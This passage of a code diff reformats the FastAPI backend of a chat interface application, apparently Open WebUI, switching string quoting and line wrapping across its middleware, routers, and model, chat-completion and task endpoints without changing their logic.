app.state.config.RAG_OLLAMA_BASE_URL - if app.state.config.RAG_EMBEDDING_ENGINE == "ollama" + if app.state.config.RAG_EMBEDDING_ENGINE == 'ollama' else app.state.config.RAG_AZURE_OPENAI_BASE_URL ) ), key=( app.state.config.RAG_OPENAI_API_KEY - if app.state.config.RAG_EMBEDDING_ENGINE == "openai" + if app.state.config.RAG_EMBEDDING_ENGINE == 'openai' else ( app.state.config.RAG_OLLAMA_API_KEY - if app.state.config.RAG_EMBEDDING_ENGINE == "ollama" + if app.state.config.RAG_EMBEDDING_ENGINE == 'ollama' else app.state.config.RAG_AZURE_OPENAI_API_KEY ) ), embedding_batch_size=app.state.config.RAG_EMBEDDING_BATCH_SIZE, azure_api_version=( app.state.config.RAG_AZURE_OPENAI_API_VERSION - if app.state.config.RAG_EMBEDDING_ENGINE == "azure_openai" + if app.state.config.RAG_EMBEDDING_ENGINE == 'azure_openai' else None ), enable_async=app.state.config.ENABLE_ASYNC_EMBEDDING, @@ -1190,9 +1169,7 @@ async def lifespan(app: FastAPI): app.state.config.CODE_EXECUTION_JUPYTER_URL = CODE_EXECUTION_JUPYTER_URL app.state.config.CODE_EXECUTION_JUPYTER_AUTH = CODE_EXECUTION_JUPYTER_AUTH app.state.config.CODE_EXECUTION_JUPYTER_AUTH_TOKEN = CODE_EXECUTION_JUPYTER_AUTH_TOKEN -app.state.config.CODE_EXECUTION_JUPYTER_AUTH_PASSWORD = ( - CODE_EXECUTION_JUPYTER_AUTH_PASSWORD -) +app.state.config.CODE_EXECUTION_JUPYTER_AUTH_PASSWORD = CODE_EXECUTION_JUPYTER_AUTH_PASSWORD app.state.config.CODE_EXECUTION_JUPYTER_TIMEOUT = CODE_EXECUTION_JUPYTER_TIMEOUT app.state.config.ENABLE_CODE_INTERPRETER = ENABLE_CODE_INTERPRETER @@ -1201,12 +1178,8 @@ async def lifespan(app: FastAPI): app.state.config.CODE_INTERPRETER_JUPYTER_URL = CODE_INTERPRETER_JUPYTER_URL app.state.config.CODE_INTERPRETER_JUPYTER_AUTH = CODE_INTERPRETER_JUPYTER_AUTH -app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_TOKEN = ( - CODE_INTERPRETER_JUPYTER_AUTH_TOKEN -) -app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD = ( - CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD -) +app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_TOKEN = CODE_INTERPRETER_JUPYTER_AUTH_TOKEN +app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD = CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD app.state.config.CODE_INTERPRETER_JUPYTER_TIMEOUT = CODE_INTERPRETER_JUPYTER_TIMEOUT ######################################## @@ -1282,9 +1255,7 @@ async def lifespan(app: FastAPI): app.state.config.AUDIO_STT_MISTRAL_API_KEY = AUDIO_STT_MISTRAL_API_KEY app.state.config.AUDIO_STT_MISTRAL_API_BASE_URL = AUDIO_STT_MISTRAL_API_BASE_URL -app.state.config.AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS = ( - AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS -) +app.state.config.AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS = AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS app.state.config.TTS_ENGINE = AUDIO_TTS_ENGINE @@ -1330,23 +1301,13 @@ async def lifespan(app: FastAPI): app.state.config.TITLE_GENERATION_PROMPT_TEMPLATE = TITLE_GENERATION_PROMPT_TEMPLATE app.state.config.TAGS_GENERATION_PROMPT_TEMPLATE = TAGS_GENERATION_PROMPT_TEMPLATE -app.state.config.IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE = ( - IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE -) -app.state.config.FOLLOW_UP_GENERATION_PROMPT_TEMPLATE = ( - FOLLOW_UP_GENERATION_PROMPT_TEMPLATE -) +app.state.config.IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE = IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE +app.state.config.FOLLOW_UP_GENERATION_PROMPT_TEMPLATE = FOLLOW_UP_GENERATION_PROMPT_TEMPLATE -app.state.config.TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE = ( - TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE -) +app.state.config.TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE = TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE app.state.config.QUERY_GENERATION_PROMPT_TEMPLATE = QUERY_GENERATION_PROMPT_TEMPLATE -app.state.config.AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE = ( - AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE -) -app.state.config.AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH = ( - AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH -) +app.state.config.AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE = AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE +app.state.config.AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH = AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH app.state.config.VOICE_MODE_PROMPT_TEMPLATE = VOICE_MODE_PROMPT_TEMPLATE @@ -1366,36 +1327,36 @@ async def lifespan(app: FastAPI): class RedirectMiddleware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): # Check if the request is a GET request - if request.method == "GET": + if request.method == 'GET': path = request.url.path query_params = dict(parse_qs(urlparse(str(request.url)).query)) redirect_params = {} # Check for the specific watch path and the presence of 'v' parameter - if path.endswith("/watch") and "v" in query_params: + if path.endswith('/watch') and 'v' in query_params: # Extract the first 'v' parameter - youtube_video_id = query_params["v"][0] - redirect_params["youtube"] = youtube_video_id + youtube_video_id = query_params['v'][0] + redirect_params['youtube'] = youtube_video_id - if "shared" in query_params and len(query_params["shared"]) > 0: + if 'shared' in query_params and len(query_params['shared']) > 0: # PWA share_target support - text = query_params["shared"][0] + text = query_params['shared'][0] if text: - urls = re.match(r"https://\S+", text) + urls = re.match(r'https://\S+', text) if urls: from open_webui.retrieval.loaders.youtube import _parse_video_id if youtube_video_id := _parse_video_id(urls[0]): - redirect_params["youtube"] = youtube_video_id + redirect_params['youtube'] = youtube_video_id else: - redirect_params["load-url"] = urls[0] + redirect_params['load-url'] = urls[0] else: - redirect_params["q"] = text + redirect_params['q'] = text if redirect_params: - redirect_url = f"/?{urlencode(redirect_params)}" + redirect_url = f'/?{urlencode(redirect_params)}' return RedirectResponse(url=redirect_url) # Proceed with the normal flow of other requests @@ -1412,43 +1373,37 @@ def __init__(self, app): self.app = app async def __call__(self, scope, receive, send): - if scope["type"] == "http": + if scope['type'] == 'http': request = Request(scope) - auth_header = request.headers.get("Authorization") + auth_header = request.headers.get('Authorization') token = None if auth_header: - parts = auth_header.split(" ", 1) + parts = auth_header.split(' ', 1) if len(parts) == 2: token = parts[1] # Only apply restrictions if an sk- API key is used - if token and token.startswith("sk-"): + if token and token.startswith('sk-'): # Check if restrictions are enabled if app.state.config.ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS: allowed_paths = [ path.strip() - for path in str( - app.state.config.API_KEYS_ALLOWED_ENDPOINTS - ).split(",") + for path in str(app.state.config.API_KEYS_ALLOWED_ENDPOINTS).split(',') if path.strip() ] request_path = request.url.path # Match exact path or prefix path is_allowed = any( - request_path == allowed - or request_path.startswith(allowed + "/") - for allowed in allowed_paths + request_path == allowed or request_path.startswith(allowed + '/') for allowed in allowed_paths ) if not is_allowed: await JSONResponse( status_code=status.HTTP_403_FORBIDDEN, - content={ - "detail": "API key not allowed to access this endpoint." - }, + content={'detail': 'API key not allowed to access this endpoint.'}, )(scope, receive, send) return @@ -1458,7 +1413,7 @@ async def __call__(self, scope, receive, send): app.add_middleware(APIKeyRestrictionMiddleware) -@app.middleware("http") +@app.middleware('http') async def commit_session_after_request(request: Request, call_next): response = await call_next(request) # log.debug("Commit session after request") @@ -1472,51 +1427,44 @@ async def commit_session_after_request(request: Request, call_next): return response -@app.middleware("http") +@app.middleware('http') async def check_url(request: Request, call_next): start_time = int(time.time()) - request.state.token = get_http_authorization_cred( - request.headers.get("Authorization") - ) + request.state.token = get_http_authorization_cred(request.headers.get('Authorization')) # Fallback to cookie token for browser sessions - if request.state.token is None and request.cookies.get("token"): + if request.state.token is None and request.cookies.get('token'): from fastapi.security import HTTPAuthorizationCredentials - request.state.token = HTTPAuthorizationCredentials( - scheme="Bearer", credentials=request.cookies.get("token") - ) + request.state.token = HTTPAuthorizationCredentials(scheme='Bearer', credentials=request.cookies.get('token')) # Fallback to x-api-key header for Anthropic Messages API routes - if request.state.token is None and request.headers.get("x-api-key"): + if request.state.token is None and request.headers.get('x-api-key'): request_path = request.url.path - if request_path in ("/api/message", "/api/v1/messages"): + if request_path in ('/api/message', '/api/v1/messages'): from fastapi.security import HTTPAuthorizationCredentials request.state.token = HTTPAuthorizationCredentials( - scheme="Bearer", credentials=request.headers.get("x-api-key") + scheme='Bearer', credentials=request.headers.get('x-api-key') ) request.state.enable_api_keys = app.state.config.ENABLE_API_KEYS response = await call_next(request) process_time = int(time.time()) - start_time - response.headers["X-Process-Time"] = str(process_time) + response.headers['X-Process-Time'] = str(process_time) return response -@app.middleware("http") +@app.middleware('http') async def inspect_websocket(request: Request, call_next): - if ( - "/ws/socket.io" in request.url.path - and request.query_params.get("transport") == "websocket" - ): - upgrade = (request.headers.get("Upgrade") or "").lower() - connection = (request.headers.get("Connection") or "").lower().split(",") + if '/ws/socket.io' in request.url.path and request.query_params.get('transport') == 'websocket': + upgrade = (request.headers.get('Upgrade') or '').lower() + connection = (request.headers.get('Connection') or '').lower().split(',') # Check that there's the correct headers for an upgrade, else reject the connection # This is to work around this upstream issue: https://github.com/miguelgrinberg/python-engineio/issues/367 - if upgrade != "websocket" or "upgrade" not in connection: + if upgrade != 'websocket' or 'upgrade' not in connection: return JSONResponse( status_code=status.HTTP_400_BAD_REQUEST, - content={"detail": "Invalid WebSocket upgrade request"}, + content={'detail': 'Invalid WebSocket upgrade request'}, ) return await call_next(request) @@ -1525,64 +1473,62 @@ async def inspect_websocket(request: Request, call_next): CORSMiddleware, allow_origins=CORS_ALLOW_ORIGIN, allow_credentials=True, - allow_methods=["*"], - allow_headers=["*"], + allow_methods=['*'], + allow_headers=['*'], ) -app.mount("/ws", socket_app) +app.mount('/ws', socket_app) -app.include_router(ollama.router, prefix="/ollama", tags=["ollama"]) -app.include_router(openai.router, prefix="/openai", tags=["openai"]) +app.include_router(ollama.router, prefix='/ollama', tags=['ollama']) +app.include_router(openai.router, prefix='/openai', tags=['openai']) -app.include_router(pipelines.router, prefix="/api/v1/pipelines", tags=["pipelines"]) -app.include_router(tasks.router, prefix="/api/v1/tasks", tags=["tasks"]) -app.include_router(images.router, prefix="/api/v1/images", tags=["images"]) +app.include_router(pipelines.router, prefix='/api/v1/pipelines', tags=['pipelines']) +app.include_router(tasks.router, prefix='/api/v1/tasks', tags=['tasks']) +app.include_router(images.router, prefix='/api/v1/images', tags=['images']) -app.include_router(audio.router, prefix="/api/v1/audio", tags=["audio"]) -app.include_router(retrieval.router, prefix="/api/v1/retrieval", tags=["retrieval"]) +app.include_router(audio.router, prefix='/api/v1/audio', tags=['audio']) +app.include_router(retrieval.router, prefix='/api/v1/retrieval', tags=['retrieval']) -app.include_router(configs.router, prefix="/api/v1/configs", tags=["configs"]) +app.include_router(configs.router, prefix='/api/v1/configs', tags=['configs']) -app.include_router(auths.router, prefix="/api/v1/auths", tags=["auths"]) -app.include_router(users.router, prefix="/api/v1/users", tags=["users"]) +app.include_router(auths.router, prefix='/api/v1/auths', tags=['auths']) +app.include_router(users.router, prefix='/api/v1/users', tags=['users']) -app.include_router(channels.router, prefix="/api/v1/channels", tags=["channels"]) -app.include_router(chats.router, prefix="/api/v1/chats", tags=["chats"]) -app.include_router(notes.router, prefix="/api/v1/notes", tags=["notes"]) +app.include_router(channels.router, prefix='/api/v1/channels', tags=['channels']) +app.include_router(chats.router, prefix='/api/v1/chats', tags=['chats']) +app.include_router(notes.router, prefix='/api/v1/notes', tags=['notes']) -app.include_router(models.router, prefix="/api/v1/models", tags=["models"]) -app.include_router(knowledge.router, prefix="/api/v1/knowledge", tags=["knowledge"]) -app.include_router(prompts.router, prefix="/api/v1/prompts", tags=["prompts"]) -app.include_router(tools.router, prefix="/api/v1/tools", tags=["tools"]) -app.include_router(skills.router, prefix="/api/v1/skills", tags=["skills"]) +app.include_router(models.router, prefix='/api/v1/models', tags=['models']) +app.include_router(knowledge.router, prefix='/api/v1/knowledge', tags=['knowledge']) +app.include_router(prompts.router, prefix='/api/v1/prompts', tags=['prompts']) +app.include_router(tools.router, prefix='/api/v1/tools', tags=['tools']) +app.include_router(skills.router, prefix='/api/v1/skills', tags=['skills']) -app.include_router(memories.router, prefix="/api/v1/memories", tags=["memories"]) -app.include_router(folders.router, prefix="/api/v1/folders", tags=["folders"]) -app.include_router(groups.router, prefix="/api/v1/groups", tags=["groups"]) -app.include_router(files.router, prefix="/api/v1/files", tags=["files"]) -app.include_router(functions.router, prefix="/api/v1/functions", tags=["functions"]) -app.include_router( - evaluations.router, prefix="/api/v1/evaluations", tags=["evaluations"] -) +app.include_router(memories.router, prefix='/api/v1/memories', tags=['memories']) +app.include_router(folders.router, prefix='/api/v1/folders', tags=['folders']) +app.include_router(groups.router, prefix='/api/v1/groups', tags=['groups']) +app.include_router(files.router, prefix='/api/v1/files', tags=['files']) +app.include_router(functions.router, prefix='/api/v1/functions', tags=['functions']) +app.include_router(evaluations.router, prefix='/api/v1/evaluations', tags=['evaluations']) if ENABLE_ADMIN_ANALYTICS: - app.include_router(analytics.router, prefix="/api/v1/analytics", tags=["analytics"]) -app.include_router(utils.router, prefix="/api/v1/utils", tags=["utils"]) -app.include_router(terminals.router, prefix="/api/v1/terminals", tags=["terminals"]) + app.include_router(analytics.router, prefix='/api/v1/analytics', tags=['analytics']) +app.include_router(utils.router, prefix='/api/v1/utils', tags=['utils']) +app.include_router(terminals.router, prefix='/api/v1/terminals', tags=['terminals']) # SCIM 2.0 API for identity management if ENABLE_SCIM: - app.include_router(scim.router, prefix="/api/v1/scim/v2", tags=["scim"]) + app.include_router(scim.router, prefix='/api/v1/scim/v2', tags=['scim']) try: audit_level = AuditLevel(AUDIT_LOG_LEVEL) except ValueError as e: - logger.error(f"Invalid audit level: {AUDIT_LOG_LEVEL}. Error: {e}") + logger.error(f'Invalid audit level: {AUDIT_LOG_LEVEL}. Error: {e}') audit_level = AuditLevel.NONE if audit_level != AuditLevel.NONE: @@ -1600,35 +1546,30 @@ async def inspect_websocket(request: Request, call_next): ################################## -@app.get("/api/models") -@app.get("/api/v1/models") # Experimental: Compatibility with OpenAI API -async def get_models( - request: Request, refresh: bool = False, user=Depends(get_verified_user) -): +@app.get('/api/models') +@app.get('/api/v1/models') # Experimental: Compatibility with OpenAI API +async def get_models(request: Request, refresh: bool = False, user=Depends(get_verified_user)): all_models = await get_all_models(request, refresh=refresh, user=user) models = [] for model in all_models: # Filter out filter pipelines - if "pipeline" in model and model["pipeline"].get("type", None) == "filter": + if 'pipeline' in model and model['pipeline'].get('type', None) == 'filter': continue # Remove profile image URL to reduce payload size - if model.get("info", {}).get("meta", {}).get("profile_image_url"): - model["info"]["meta"].pop("profile_image_url", None) + if model.get('info', {}).get('meta', {}).get('profile_image_url'): + model['info']['meta'].pop('profile_image_url', None) try: - model_tags = [ - tag.get("name") - for tag in model.get("info", {}).get("meta", {}).get("tags", []) - ] - tags = [tag.get("name") for tag in model.get("tags", [])] + model_tags = [tag.get('name') for tag in model.get('info', {}).get('meta', {}).get('tags', [])] + tags = [tag.get('name') for tag in model.get('tags', [])] tags = list(set(model_tags + tags)) - model["tags"] = [{"name": tag} for tag in tags] + model['tags'] = [{'name': tag} for tag in tags] except Exception as e: - log.debug(f"Error processing model tags: {e}") - model["tags"] = [] + log.debug(f'Error processing model tags: {e}') + model['tags'] = [] pass models.append(model) @@ -1639,35 +1580,33 @@ async def get_models( # Sort models by order list priority, with fallback for those not in the list models.sort( key=lambda model: ( - model_order_dict.get(model.get("id", ""), float("inf")), - (model.get("name", "") or ""), + model_order_dict.get(model.get('id', ''), float('inf')), + (model.get('name', '') or ''), ) ) models = get_filtered_models(models, user) log.debug( - f"/api/models returned filtered models accessible to the user: {json.dumps([model.get('id') for model in models])}" + f'/api/models returned filtered models accessible to the user: {json.dumps([model.get("id") for model in models])}' ) - return {"data": models} + return {'data': models} -@app.get("/api/models/base") +@app.get('/api/models/base') async def get_base_models(request: Request, user=Depends(get_admin_user)): models = await get_all_base_models(request, user=user) - return {"data": models} + return {'data': models} ################################## # Embeddings ################################## -@app.post("/api/embeddings") -@app.post("/api/v1/embeddings") # Experimental: Compatibility with OpenAI API -async def embeddings( - request: Request, form_data: dict, user=Depends(get_verified_user) -): +@app.post('/api/embeddings') +@app.post('/api/v1/embeddings') # Experimental: Compatibility with OpenAI API +async def embeddings(request: Request, form_data: dict, user=Depends(get_verified_user)): """ OpenAI-compatible embeddings endpoint. @@ -1690,8 +1629,8 @@ async def embeddings( return await generate_embeddings(request, form_data, user) -@app.post("/api/chat/completions") -@app.post("/api/v1/chat/completions") # Experimental: Compatibility with OpenAI API +@app.post('/api/chat/completions') +@app.post('/api/v1/chat/completions') # Experimental: Compatibility with OpenAI API async def chat_completion( request: Request, form_data: dict, @@ -1700,24 +1639,22 @@ async def chat_completion( if not request.app.state.MODELS: await get_all_models(request, user=user) - model_id = form_data.get("model", None) - model_item = form_data.pop("model_item", {}) - tasks = form_data.pop("background_tasks", None) + model_id = form_data.get('model', None) + model_item = form_data.pop('model_item', {}) + tasks = form_data.pop('background_tasks', None) metadata = {} try: model_info = None - if not model_item.get("direct", False): + if not model_item.get('direct', False): if model_id not in request.app.state.MODELS: - raise Exception("Model not found") + raise Exception('Model not found') model = request.app.state.MODELS[model_id] model_info = Models.get_model_by_id(model_id) # Check if user has access to the model - if not BYPASS_MODEL_ACCESS_CONTROL and ( - user.role != "admin" or not BYPASS_ADMIN_ACCESS_CONTROL - ): + if not BYPASS_MODEL_ACCESS_CONTROL and (user.role != 'admin' or not BYPASS_ADMIN_ACCESS_CONTROL): try: check_model_access(user, model) except Exception as e: @@ -1729,235 +1666,206 @@ async def chat_completion( request.state.model = model # Model params: global defaults as base, per-model overrides win - default_model_params = ( - getattr(request.app.state.config, "DEFAULT_MODEL_PARAMS", None) or {} - ) + default_model_params = getattr(request.app.state.config, 'DEFAULT_MODEL_PARAMS', None) or {} model_info_params = { **default_model_params, - **( - model_info.params.model_dump() - if model_info and model_info.params - else {} - ), + **(model_info.params.model_dump() if model_info and model_info.params else {}), } # Check base model existence for custom models if model_info and model_info.base_model_id: base_model_id = model_info.base_model_id if base_model_id not in request.app.state.MODELS: if ENABLE_CUSTOM_MODEL_FALLBACK: - default_models = ( - request.app.state.config.DEFAULT_MODELS or "" - ).split(",") + default_models = (request.app.state.config.DEFAULT_MODELS or '').split(',') - fallback_model_id = ( - default_models[0].strip() if default_models[0] else None - ) + fallback_model_id = default_models[0].strip() if default_models[0] else None - if ( - fallback_model_id - and fallback_model_id in request.app.state.MODELS - ): + if fallback_model_id and fallback_model_id in request.app.state.MODELS: # Update model and form_data so routing uses the fallback model's type model = request.app.state.MODELS[fallback_model_id] - form_data["model"] = fallback_model_id + form_data['model'] = fallback_model_id else: - raise Exception("Model not found") + raise Exception('Model not found') else: - raise Exception("Model not found") + raise Exception('Model not found') # Chat Params - stream_delta_chunk_size = form_data.get("params", {}).get( - "stream_delta_chunk_size" - ) - reasoning_tags = form_data.get("params", {}).get("reasoning_tags") + stream_delta_chunk_size = form_data.get('params', {}).get('stream_delta_chunk_size') + reasoning_tags = form_data.get('params', {}).get('reasoning_tags') # Model Params - if model_info_params.get("stream_response") is not None: - form_data["stream"] = model_info_params.get("stream_response") + if model_info_params.get('stream_response') is not None: + form_data['stream'] = model_info_params.get('stream_response') - if model_info_params.get("stream_delta_chunk_size"): - stream_delta_chunk_size = model_info_params.get("stream_delta_chunk_size") + if model_info_params.get('stream_delta_chunk_size'): + stream_delta_chunk_size = model_info_params.get('stream_delta_chunk_size') - if model_info_params.get("reasoning_tags") is not None: - reasoning_tags = model_info_params.get("reasoning_tags") + if model_info_params.get('reasoning_tags') is not None: + reasoning_tags = model_info_params.get('reasoning_tags') metadata = { - "user_id": user.id, - "chat_id": form_data.pop("chat_id", None), - "message_id": form_data.pop("id", None), - "parent_message": form_data.pop("parent_message", None), - "parent_message_id": form_data.pop("parent_id", None), - "session_id": form_data.pop("session_id", None), - "filter_ids": form_data.pop("filter_ids", []), - "tool_ids": form_data.get("tool_ids", None), - "tool_servers": form_data.pop("tool_servers", None), - "files": form_data.get("files", None), - "features": form_data.get("features", {}), - "variables": form_data.get("variables", {}), - "model": model, - "direct": model_item.get("direct", False), - "params": { - "stream_delta_chunk_size": stream_delta_chunk_size, - "reasoning_tags": reasoning_tags, - "function_calling": ( - "native" + 'user_id': user.id, + 'chat_id': form_data.pop('chat_id', None), + 'message_id': form_data.pop('id', None), + 'parent_message': form_data.pop('parent_message', None), + 'parent_message_id': form_data.pop('parent_id', None), + 'session_id': form_data.pop('session_id', None), + 'filter_ids': form_data.pop('filter_ids', []), + 'tool_ids': form_data.get('tool_ids', None), + 'tool_servers': form_data.pop('tool_servers', None), + 'files': form_data.get('files', None), + 'features': form_data.get('features', {}), + 'variables': form_data.get('variables', {}), + 'model': model, + 'direct': model_item.get('direct', False), + 'params': { + 'stream_delta_chunk_size': stream_delta_chunk_size, + 'reasoning_tags': reasoning_tags, + 'function_calling': ( + 'native' if ( - form_data.get("params", {}).get("function_calling") == "native" - or model_info_params.get("function_calling") == "native" + form_data.get('params', {}).get('function_calling') == 'native' + or model_info_params.get('function_calling') == 'native' ) - else "default" + else 'default' ), }, } - if metadata.get("chat_id") and user: - if not metadata["chat_id"].startswith( - "local:" - ): # temporary chats are not stored - + if metadata.get('chat_id') and user: + if not metadata['chat_id'].startswith('local:'): # temporary chats are not stored # Verify chat ownership — lightweight EXISTS check avoids # deserializing the full chat JSON blob just to confirm the row exists if ( - not Chats.is_chat_owner(metadata["chat_id"], user.id) - and user.role != "admin" + not Chats.is_chat_owner(metadata['chat_id'], user.id) and user.role != 'admin' ): # admins can access any chat raise HTTPException( status_code=status.HTTP_404_NOT_FOUND, detail=ERROR_MESSAGES.DEFAULT(), ) # Insert chat files from parent message if any - parent_message = metadata.get("parent_message") or {} - parent_message_files = parent_message.get("files", []) + parent_message = metadata.get('parent_message') or {} + parent_message_files = parent_message.get('files', []) if parent_message_files: try: Chats.insert_chat_files( - metadata["chat_id"], - parent_message.get("id"), + metadata['chat_id'], + parent_message.get('id'), [ - file_item.get("id") + file_item.get('id') for file_item in parent_message_files - if file_item.get("type") == "file" + if file_item.get('type') == 'file' ], user.id, ) except Exception as e: - log.debug(f"Error inserting chat files: {e}") + log.debug(f'Error inserting chat files: {e}') pass request.state.metadata = metadata - form_data["metadata"] = metadata + form_data['metadata'] = metadata except Exception as e: - log.debug(f"Error processing chat metadata: {e}") + log.debug(f'Error processing chat metadata: {e}') raise HTTPException( status_code=status.HTTP_400_BAD_REQUEST, detail=str(e), ) async def process_chat(request, form_data, user, metadata, model): try: - form_data, metadata, events = await process_chat_payload( - request, form_data, user, metadata, model - ) + form_data, metadata, events = await process_chat_payload(request, form_data, user, metadata, model) response = await chat_completion_handler(request, form_data, user) - if metadata.get("chat_id") and metadata.get("message_id"): + if metadata.get('chat_id') and metadata.get('message_id'): try: - if not metadata["chat_id"].startswith("local:"): + if not metadata['chat_id'].startswith('local:'): Chats.upsert_message_to_chat_by_id_and_message_id( - metadata["chat_id"], - metadata["message_id"], + metadata['chat_id'], + metadata['message_id'], { - "parentId": metadata.get("parent_message_id", None), - "model": model_id, + 'parentId': metadata.get('parent_message_id', None), + 'model': model_id, }, ) except Exception: pass - ctx = build_chat_response_context( - request, form_data, user, model, metadata, tasks, events - ) + ctx = build_chat_response_context(request, form_data, user, model, metadata, tasks, events) return await process_chat_response(response, ctx) except asyncio.CancelledError: - log.info("Chat processing was cancelled") + log.info('Chat processing was cancelled') try: event_emitter = get_event_emitter(metadata) await asyncio.shield( event_emitter( - {"type": "chat:tasks:cancel"}, + {'type': 'chat:tasks:cancel'}, ) ) except Exception as e: pass finally: raise # re-raise to ensure proper task cancellation handling except Exception as e: - log.debug(f"Error processing chat payload: {e}") - if metadata.get("chat_id") and metadata.get("message_id"): + log.debug(f'Error processing chat payload: {e}') + if metadata.get('chat_id') and metadata.get('message_id'): # Update the chat message with the error try: - if not metadata["chat_id"].startswith("local:"): + if not metadata['chat_id'].startswith('local:'): Chats.upsert_message_to_chat_by_id_and_message_id( - metadata["chat_id"], - metadata["message_id"], + metadata['chat_id'], + metadata['message_id'], { - "parentId": metadata.get("parent_message_id", None), - "error": {"content": str(e)}, + 'parentId': metadata.get('parent_message_id', None), + 'error': {'content': str(e)}, }, ) event_emitter = get_event_emitter(metadata) await event_emitter( { - "type": "chat:message:error", - "data": {"error": {"content": str(e)}}, + 'type': 'chat:message:error', + 'data': {'error': {'content': str(e)}}, } ) await event_emitter( - {"type": "chat:tasks:cancel"}, + {'type': 'chat:tasks:cancel'}, ) except Exception: pass finally: try: - if mcp_clients := metadata.get("mcp_clients"): + if mcp_clients := metadata.get('mcp_clients'): for client in reversed(mcp_clients.values()): await client.disconnect() except Exception as e: - log.debug(f"Error cleaning up: {e}") + log.debug(f'Error cleaning up: {e}') pass # Emit chat:active=false when task completes try: - if metadata.get("chat_id"): + if metadata.get('chat_id'): event_emitter = get_event_emitter(metadata, update_db=False) if event_emitter: - await event_emitter( - {"type": "chat:active", "data": {"active": False}} - ) + await event_emitter({'type': 'chat:active', 'data': {'active': False}}) except Exception as e: - log.debug(f"Error emitting chat:active: {e}") + log.debug(f'Error emitting chat:active: {e}') - if ( - metadata.get("session_id") - and metadata.get("chat_id") - and metadata.get("message_id") - ): + if metadata.get('session_id') and metadata.get('chat_id') and metadata.get('message_id'): # Asynchronous Chat Processing task_id, _ = await create_task( request.app.state.redis, process_chat(request, form_data, user, metadata, model), - id=metadata["chat_id"], + id=metadata['chat_id'], ) # Emit chat:active=true when task starts event_emitter = get_event_emitter(metadata, update_db=False) if event_emitter: - await event_emitter({"type": "chat:active", "data": {"active": True}}) - return {"status": True, "task_id": task_id} + await event_emitter({'type': 'chat:active', 'data': {'active': True}}) + return {'status': True, 'task_id': task_id} else: return await process_chat(request, form_data, user, metadata, model) @@ -1981,8 +1889,8 @@ async def process_chat(request, form_data, user, metadata, model): ) -@app.post("/api/message") -@app.post("/api/v1/messages") # Anthropic Messages API compatible endpoint +@app.post('/api/message') +@app.post('/api/v1/messages') # Anthropic Messages API compatible endpoint async def generate_messages( request: Request, form_data: dict, @@ -2002,7 +1910,7 @@ async def generate_messages( Anthropic's x-api-key header (via middleware translation). """ # Convert Anthropic payload to OpenAI format - requested_model = form_data.get("model", "") + requested_model = form_data.get('model', '') openai_payload = convert_anthropic_to_openai_payload(form_data) @@ -2013,13 +1921,11 @@ async def generate_messages( if isinstance(response, StreamingResponse): # Streaming response: wrap the generator to convert SSE format return StreamingResponse( - openai_stream_to_anthropic_stream( - response.body_iterator, model=requested_model - ), - media_type="text/event-stream", + openai_stream_to_anthropic_stream(response.body_iterator, model=requested_model), + media_type='text/event-stream', headers={ - "Cache-Control": "no-cache", - "Connection": "keep-alive", + 'Cache-Control': 'no-cache', + 'Connection': 'keep-alive', }, ) elif isinstance(response, dict): @@ -2029,14 +1935,12 @@ async def generate_messages( return response -@app.post("/api/chat/completed") -async def chat_completed( - request: Request, form_data: dict, user=Depends(get_verified_user) -): +@app.post('/api/chat/completed') +async def chat_completed(request: Request, form_data: dict, user=Depends(get_verified_user)): try: - model_item = form_data.pop("model_item", {}) + model_item = form_data.pop('model_item', {}) - if model_item.get("direct", False): + if model_item.get('direct', False): request.state.direct = True request.state.model = model_item @@ -2048,14 +1952,12 @@ async def chat_completed( ) -@app.post("/api/chat/actions/{action_id}") -async def chat_action( - request: Request, action_id: str, form_data: dict, user=Depends(get_verified_user) -): +@app.post('/api/chat/actions/{action_id}') +async def chat_action(request: Request, action_id: str, form_data: dict, user=Depends(get_verified_user)): try: - model_item = form_data.pop("model_item", {}) + model_item = form_data.pop('model_item', {}) - if model_item.get("direct", False): + if model_item.get('direct', False): request.state.direct = True request.state.model = model_item @@ -2067,34 +1969,30 @@ async def chat_action( ) -@app.post("/api/tasks/stop/{task_id}") -async def stop_task_endpoint( - request: Request, task_id: str, user=Depends(get_verified_user) -): +@app.post('/api/tasks/stop/{task_id}') +async def stop_task_endpoint(request: Request, task_id: str, user=Depends(get_verified_user)): try: result = await stop_task(request.app.state.redis, task_id) return result except ValueError as e: raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) -@app.get("/api/tasks") +@app.get('/api/tasks') async def list_tasks_endpoint(request: Request, user=Depends(get_verified_user)): - return {"tasks": await list_tasks(request.app.state.redis)} + return {'tasks': await list_tasks(request.app.state.redis)} -@app.get("/api/tasks/chat/{chat_id}") -async def list_tasks_by_chat_id_endpoint( - request: Request, chat_id: str, user=Depends(get_verified_user) -): +@app.get('/api/tasks/chat/{chat_id}') +async def list_tasks_by_chat_id_endpoint(request: Request, chat_id: str, user=Depends(get_verified_user)): chat = Chats.get_chat_by_id(chat_id) if chat is None or chat.user_id != user.id: - return {"task_ids": []} + return {'task_ids': []} task_ids = await list_task_ids_by_item_id(request.app.state.redis, chat_id) - log.debug(f"Task IDs for chat 